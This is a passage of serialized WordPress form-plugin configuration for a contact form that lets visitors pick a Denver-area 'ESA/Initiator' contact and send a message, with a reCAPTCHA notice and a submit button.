Central\";s:5:\"value\";s:44:\"esa-initiator-fred-bell-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:49:\"ESA/Initiator-Gordon Garland-Denver Metro Central\";s:5:\"value\";s:24:\"Initiator-Vickie Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:52:\"ESA/Initiator-Bette Jean Wagner-Denver Metro Central\";s:5:\"value\";s:52:\"ESA-Initiator-bette-jean-wagner-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:46:\"ESA/Initiator-James Fischer-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-James Fischer-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";s:12:\"manual_value\";b:1;}i:5;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Lura Fischer-Denver Metro North\";s:5:\"value\";s:41:\"initiator-lura-fischer-denver-metro-north\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:46:\"ESA/Initiator-Lura Lee Genz-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-Lura Lee Genz-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"ESA/Initiator-Tim Kuss-Denver Metro South\";s:5:\"value\";s:41:\"esa-initiator-tim-kuss-denver-metro-south\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Jack Lile-Denver Metro South \";s:5:\"value\";s:43:\"ESA-Initiator-Jack Lile-Denver Metro South \";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Raelin Harp-Denver Metro East\";s:5:\"value\";s:43:\"esa-initiator-raelin-harp-denver-metro-east\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:26:\"ESA/Initiator-Linda Bowman\";s:5:\"value\";s:26:\"ESA-Initiator-Linda Bowman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Rolf Mueller-Uri\";s:5:\"value\";s:29:\"ESAInitiator-Rolf Mueller-Uri\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:40:\"Initiator-Mary Griggs-Denver Metro West \";s:5:\"value\";s:39:\"initiator-mary-griggs-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Renee Wholey-Denver Metro West \";s:5:\"value\";s:40:\"initiator-renee-wholey-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166297230\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_101\";}s:2:\"id\";i:293;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_102\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_102\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:294;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797718830\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"617\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_104\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_104\";}s:2:\"id\";i:296;}i:10;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797717432\";}s:2:\"id\";s:3:\"618\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:9:\"Save 